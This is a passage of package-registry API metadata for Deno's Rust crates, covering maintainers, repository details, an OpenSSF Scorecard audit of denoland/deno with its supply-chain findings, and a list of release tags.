yste.ms/api/v1/hosts/GitHub/authors/Mohsen-mhm"}],"active_maintainers":[{"login":"bartlomieju","count":396,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/bartlomieju"},{"login":"nathanwhit","count":183,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/nathanwhit"},{"login":"crowlKats","count":35,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/crowlKats"},{"login":"littledivy","count":35,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/littledivy"},{"login":"dsherret","count":22,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/dsherret"},{"login":"denobot","count":10,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/denobot"},{"login":"devsnek","count":9,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/devsnek"},{"login":"magurotuna","count":7,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/magurotuna"},{"login":"piscisaureus","count":7,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/piscisaureus"},{"login":"lucacasonato","count":3,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/lucacasonato"},{"login":"ry","count":2,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/ry"},{"login":"kt3k","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/kt3k"}]},"versions_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/packages/deno_typescript/versions","version_numbers_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/packages/deno_typescript/version_numbers","latest_version_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/packages/deno_typescript/latest_version","dependent_packages_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/packages/deno_typescript/dependent_packages","related_packages_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/packages/deno_typescript/related_packages","codemeta_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/packages/deno_typescript/codemeta","maintainers":[{"uuid":"28170","login":"ry","name":"Ryan Dahl","email":null,"url":"https://github.com/ry","packages_count":18,"html_url":"https://crates.io/users/ry","role":null,"created_at":"2022-11-07T18:29:35.795Z","updated_at":"2022-11-07T18:29:35.795Z","packages_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/maintainers/ry/packages"},{"uuid":"45082","login":"piscisaureus","name":"Bert Belder","email":null,"url":"https://github.com/piscisaureus","packages_count":12,"html_url":"https://crates.io/users/piscisaureus","role":null,"created_at":"2022-11-07T18:29:35.804Z","updated_at":"2022-11-07T18:29:35.804Z","packages_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/maintainers/piscisaureus/packages"}],"registry":{"name":"crates.io","url":"https://crates.io","ecosystem":"cargo","default":true,"packages_count":338199,"maintainers_count":71476,"namespaces_count":0,"keywords_count":71845,"github":"rust-lang","metadata":{"funded_packages_count":30558,"rate_limit":2},"icon_url":"https://github.com/rust-lang.png","created_at":"2022-04-04T15:19:22.689Z","updated_at":"2026-09-04T05:05:22.166Z","packages_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/packages","maintainers_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/maintainers","namespaces_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/namespaces"}},{"id":4047788,"name":"deno_webidl","ecosystem":"cargo","description":"WebIDL implementation for Deno","homepage":null,"licenses":"MIT","normalized_licenses":["MIT"],"repository_url":"https://github.com/denoland/deno","keywords_array":[],"namespace":null,"versions_count":260,"first_release_published_at":"2021-03-12T20:55:43.676Z","latest_release_published_at":"2026-08-27T15:20:09.394Z","latest_release_number":"0.258.0","last_synced_at":"2026-09-07T22:59:41.892Z","created_at":"2022-04-12T10:02:32.524Z","updated_at":"2026-09-07T22:59:41.893Z","registry_url":"https://crates.io/crates/deno_webidl/","install_command":"cargo install deno_webidl","documentation_url":"https://docs.rs/deno_webidl/","metadata":{"categories":[]},"repo_metadata":{"id":37251508,"uuid":"133442384","full_name":"denoland/deno","owner":"denoland","description":"A modern runtime for JavaScript and TypeScript.","archived":false,"fork":false,"pushed_at":"2026-08-22T12:52:12.000Z","size":247311,"stargazers_count":108275,"open_issues_count":1528,"forks_count":6351,"subscribers_count":1426,"default_branch":"main","last_synced_at":"2026-08-22T15:40:08.889Z","etag":null,"topics":["deno","javascript","rust","typescript"],"latest_commit_sha":null,"homepage":"https://deno.com","language":"Rust","has_issues":true,"has_wiki":null,"has_pages":null,"mirror_url":null,"source_name":null,"license":"mit","status":null,"scm":"git","pull_requests_enabled":true,"icon_url":"https://github.com/denoland.png","metadata":{"files":{"readme":"README.md","changelog":null,"contributing":".github/CONTRIBUTING.md","funding":null,"license":"LICENSE.md","code_of_conduct":".github/CODE_OF_CONDUCT.md","threat_model":null,"audit":null,"citation":null,"codeowners":null,"security":".github/SECURITY.md","support":null,"governance":null,"roadmap":null,"authors":null,"dei":null,"publiccode":null,"codemeta":null,"zenodo":null,"notice":null,"maintainers":null,"copyright":null,"agents":null,"claude":"CLAUDE.md","gemini":null,"cursor":null,"copilot":".github/copilot-instructions.md","dco":null,"cla":null,"disclosure":null}},"created_at":"2018-05-15T01:34:26.000Z","updated_at":"2026-08-22T14:38:59.000Z","dependencies_parsed_at":"2026-08-08T17:34:36.142Z","dependency_job_id":null,"html_url":"https://github.com/denoland/deno","commit_stats":{"total_commits":12946,"total_committers":999,"mean_commits":12.95895895895896,"dds":0.8464390545342191,"last_synced_commit":"9ad0d4c3db85ce9f8007dc088d164bcc7f544708"},"previous_names":[],"tags_count":440,"template":false,"template_full_name":null,"purl":"pkg:github/denoland/deno","repository_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno","tags_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags","releases_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/releases","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/manifests","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/denoland","download_url":"https://codeload.github.com/denoland/deno/tar.gz/refs/heads/main","sbom_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/sbom","scorecard":{"id":334411,"data":{"date":"2025-08-11","repo":{"name":"github.com/denoland/deno","commit":"228574b04210ad54baf04126810e2c113a462bcc"},"scorecard":{"version":"v5.2.1-40-gf6ed084d","commit":"f6ed084d17c9236477efd66e5b258b9d4cc7b389"},"score":5.6,"checks":[{"name":"Maintained","score":10,"reason":"30 commit(s) and 14 issue activity found in the last 90 days -- score normalized to 10","details":null,"documentation":{"short":"Determines if the project is \"actively maintained\".","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#maintained"}},{"name":"Code-Review","score":10,"reason":"all changesets reviewed","details":null,"documentation":{"short":"Determines if the project requires human code review before pull requests (aka merge requests) are merged.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#code-review"}},{"name":"Security-Policy","score":10,"reason":"security policy file detected","details":["Info: security policy file detected: .github/SECURITY.md:1","Info: Found linked content: .github/SECURITY.md:1","Info: Found disclosure, vulnerability, and/or timelines in security policy: .github/SECURITY.md:1","Info: Found text in security policy: .github/SECURITY.md:1"],"documentation":{"short":"Determines if the project has published a security policy.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#security-policy"}},{"name":"CII-Best-Practices","score":0,"reason":"no effort to earn an OpenSSF best practices badge detected","details":null,"documentation":{"short":"Determines if the project has an OpenSSF (formerly CII) Best Practices Badge.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#cii-best-practices"}},{"name":"Token-Permissions","score":0,"reason":"detected GitHub workflow tokens with excessive permissions","details":["Warn: jobLevel 'contents' permission set to 'write': .github/workflows/promote_to_release.yml:24","Warn: no topLevel permission defined: .github/workflows/cargo_publish.yml:1","Warn: topLevel 'contents' permission set to 'write': .github/workflows/ci.yml:5","Warn: no topLevel permission defined: .github/workflows/node_compat_test.yml:1","Warn: no topLevel permission defined: .github/workflows/post_publish.yml:1","Warn: no topLevel permission defined: .github/workflows/pr.yml:1","Warn: no topLevel permission defined: .github/workflows/promote_to_release.yml:1","Warn: no topLevel permission defined: .github/workflows/start_release.yml:1","Warn: no topLevel permission defined: .github/workflows/version_bump.yml:1","Warn: no topLevel permission defined: .github/workflows/wpt_epoch.yml:1"],"documentation":{"short":"Determines if the project's workflows follow the principle of least privilege.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#token-permissions"}},{"name":"License","score":10,"reason":"license file detected","details":["Info: project has a license file: LICENSE.md:0","Info: FSF or OSI recognized license: MIT License: LICENSE.md:0"],"documentation":{"short":"Determines if the project has defined a license.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#license"}},{"name":"Dangerous-Workflow","score":10,"reason":"no dangerous workflow patterns detected","details":null,"documentation":{"short":"Determines if the project's GitHub Action workflows avoid dangerous patterns.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#dangerous-workflow"}},{"name":"Binary-Artifacts","score":5,"reason":"binaries present in source code","details":["Warn: binary detected: tests/specs/npm/pkg_index_ts_and_js/node_modules/package/wasm/index.wasm:1","Warn: binary detected: tests/specs/run/error_bad_wasm_import/toolkit.wasm:1","Warn: binary detected: tests/specs/run/wasm_module/cjs_importing/math.wasm:1","Warn: binary detected: tests/specs/run/wasm_module/table_global_memory/mod.wasm:1","Warn: binary detected: tests/specs/run/wasm_unreachable/unreachable.wasm:1"],"documentation":{"short":"Determines if the project has generated executable (binary) artifacts in the source repository.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#binary-artifacts"}},{"name":"Branch-Protection","score":8,"reason":"branch protection is not maximal on development and all release branches","details":["Info: 'allow deletion' disabled on branch 'main'","Info: 'force pushes' disabled on branch 'main'","Warn: required approving review count is 1 on branch 'main'","Warn: codeowners review is not required on branch 'main'","Info: status check found to merge onto on branch 'main'","Info: PRs are required in order to make changes on branch 'main'"],"documentation":{"short":"Determines if the default and release branches are protected with GitHub's branch protection settings.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#branch-protection"}},{"name":"Signed-Releases","score":0,"reason":"Project has not signed or included provenance with any releases.","details":["Warn: release artifact v2.4.4 not signed: https://api.github.com/repos/denoland/deno/releases/239816232","Warn: release artifact v2.4.3 not signed: https://api.github.com/repos/denoland/deno/releases/236453990","Warn: release artifact v2.4.2 not signed: https://api.github.com/repos/denoland/deno/releases/232832123","Warn: release artifact v2.2.14 not signed: https://api.github.com/repos/denoland/deno/releases/232804459","Warn: release artifact v2.4.1 not signed: https://api.github.com/repos/denoland/deno/releases/230701638","Warn: release artifact v2.4.4 does not have provenance: https://api.github.com/repos/denoland/deno/releases/239816232","Warn: release artifact v2.4.3 does not have provenance: https://api.github.com/repos/denoland/deno/releases/236453990","Warn: release artifact v2.4.2 does not have provenance: https://api.github.com/repos/denoland/deno/releases/232832123","Warn: release artifact v2.2.14 does not have provenance: https://api.github.com/repos/denoland/deno/releases/232804459","Warn: release artifact v2.4.1 does not have provenance: https://api.github.com/repos/denoland/deno/releases/230701638"],"documentation":{"short":"Determines if the project cryptographically signs release artifacts.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#signed-releases"}},{"name":"Packaging","score":10,"reason":"packaging workflow detected","details":["Info: Project packages its releases by way of GitHub Actions.: .github/workflows/npm_publish.yml:16"],"documentation":{"short":"Determines if the project is published as a package that others can easily download, install, easily update, and uninstall.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#packaging"}},{"name":"Pinned-Dependencies","score":0,"reason":"dependency not pinned by hash detected -- score normalized to 0","details":["Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/cargo_publish.yml:28: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/cargo_publish.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/cargo_publish.yml:34: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/cargo_publish.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/cargo_publish.yml:37: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/cargo_publish.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:790: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:795: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:822: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:829: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:35: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:153: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:182: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:194: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:198: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:202: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:216: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:226: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:240: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:251: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:384: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:401: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:462: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:509: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:522: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:731: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:766: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:22: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:26: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:30: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:34: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:41: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:57: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:61: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:63: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:67: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:74: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/npm_publish.yml:28: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/npm_publish.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/npm_publish.yml:33: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/npm_publish.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/npm_publish.yml:37: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/npm_publish.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/post_publish.yml:14: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/post_publish.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/post_publish.yml:15: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/post_publish.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/post_publish.yml:19: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/post_publish.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/post_publish.yml:27: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/post_publish.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/pr.yml:16: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/pr.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:30: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:36: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:65: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:73: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:104: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:119: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:125: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:133: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:138: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:155: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/start_release.yml:34: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/start_release.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/start_release.yml:37: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/start_release.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/version_bump.yml:35: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/version_bump.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/version_bump.yml:40: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/version_bump.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/version_bump.yml:43: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/version_bump.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/wpt_epoch.yml:27: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/wpt_epoch.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/wpt_epoch.yml:33: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/wpt_epoch.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/wpt_epoch.yml:38: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/wpt_epoch.yml/main?enable=pin","Warn: containerImage not pinned by hash: .devcontainer/Dockerfile:1: pin your Docker image by updating mcr.microsoft.com/devcontainers/rust:1 to mcr.microsoft.com/devcontainers/rust:1@sha256:fc57fb865035c5395e85246c8842b071ced6e7cde727b3c98abbcc794eaf4759","Warn: downloadThenRun not pinned by hash: .devcontainer/Dockerfile:10","Info:   0 out of  25 GitHub-owned GitHubAction dependencies pinned","Info:   0 out of  35 third-party GitHubAction dependencies pinned","Info:   0 out of   1 containerImage dependencies pinned","Info:   0 out of   1 downloadThenRun dependencies pinned"],"documentation":{"short":"Determines if the project has declared and pinned the dependencies of its build process.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#pinned-dependencies"}},{"name":"Fuzzing","score":0,"reason":"project is not fuzzed","details":["Warn: no fuzzer integrations found"],"documentation":{"short":"Determines if the project uses fuzzing.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#fuzzing"}},{"name":"SAST","score":0,"reason":"SAST tool is not run on all commits -- score normalized to 0","details":["Warn: 0 commits out of 30 are checked with a SAST tool"],"documentation":{"short":"Determines if the project uses static code analysis.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#sast"}},{"name":"Vulnerabilities","score":6,"reason":"4 existing vulnerabilities detected","details":["Warn: Project is vulnerable to: GHSA-v7pc-74h8-xq2h","Warn: Project is vulnerable to: RUSTSEC-2025-0006","Warn: Project is vulnerable to: RUSTSEC-2024-0436","Warn: Project is vulnerable to: RUSTSEC-2023-0071 / GHSA-4grx-2x9w-596c / GHSA-c38w-74pg-36hr"],"documentation":{"short":"Determines if the project has open, known unfixed vulnerabilities.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#vulnerabilities"}}]},"last_synced_at":"2025-08-18T04:23:13.226Z","repository_id":37251508,"created_at":"2025-08-18T04:23:13.226Z","updated_at":"2025-08-18T04:23:13.226Z"},"host":{"name":"GitHub","url":"https://github.com","kind":"github","repositories_count":286080680,"owners_count":36827962,"icon_url":"https://github.com/github.png","version":null,"created_at":"2022-05-30T11:31:42.601Z","updated_at":"2026-08-22T15:14:58.755Z","status":"ssl_error","status_checked_at":"2026-08-22T15:14:58.237Z","response_time":51,"last_error":"SSL_read: unexpected eof while reading","robots_txt_status":"success","robots_txt_updated_at":"2025-07-24T06:49:26.215Z","robots_txt_url":"https://github.com/robots.txt","online":false,"can_crawl_api":true,"host_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories","repository_names_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repository_names","owners_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners"},"owner_record":{"login":"denoland","name":"Deno","uuid":"42048915","kind":"organization","description":"","email":"support@deno.com","website":"https://deno.land","location":null,"twitter":"deno_land","company":null,"icon_url":"https://avatars.githubusercontent.com/u/42048915?v=4","repositories_count":89,"last_synced_at":"2023-04-09T21:37:02.792Z","metadata":{"has_sponsors_listing":false},"html_url":"https://github.com/denoland","funding_links":[],"total_stars":null,"followers":null,"following":null,"created_at":"2022-11-02T16:32:27.195Z","updated_at":"2023-04-09T21:37:03.563Z","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/denoland","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/denoland/repositories"},"tags":[{"name":"v2.9.5","sha":"17fadf33a8df3af9488b9f42efd1f2290d6dc7a3","kind":"commit","published_at":"2026-08-06T11:40:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.9.5","html_url":"https://github.com/denoland/deno/releases/tag/v2.9.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.9.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.5/manifests"},{"name":"v2.9.4","sha":"14eea3160ae5834476aa3b9d317b8d41d991b982","kind":"commit","published_at":"2026-07-23T14:13:55.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.9.4","html_url":"https://github.com/denoland/deno/releases/tag/v2.9.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.9.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.4/manifests"},{"name":"v2.9.3","sha":"f39575ecd50602a5b42b1ba8e93849460de9fcf4","kind":"commit","published_at":"2026-07-15T13:38:12.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.9.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.9.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.9.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.3/manifests"},{"name":"v2.9.2","sha":"356c132ed60e679b34535a287a493193aa8bb6a4","kind":"commit","published_at":"2026-07-08T10:45:38.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.9.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.9.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.9.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.2/manifests"},{"name":"v2.9.1","sha":"7afe265234add47e7602f2e91c318f3eff245aa8","kind":"commit","published_at":"2026-07-01T13:28:43.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.9.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.9.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.9.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.1/manifests"},{"name":"v2.9.0","sha":"94d375ddd02b7b9eb464781e4bd9e68bf262aacc","kind":"commit","published_at":"2026-06-25T11:49:52.000Z","download_url":"h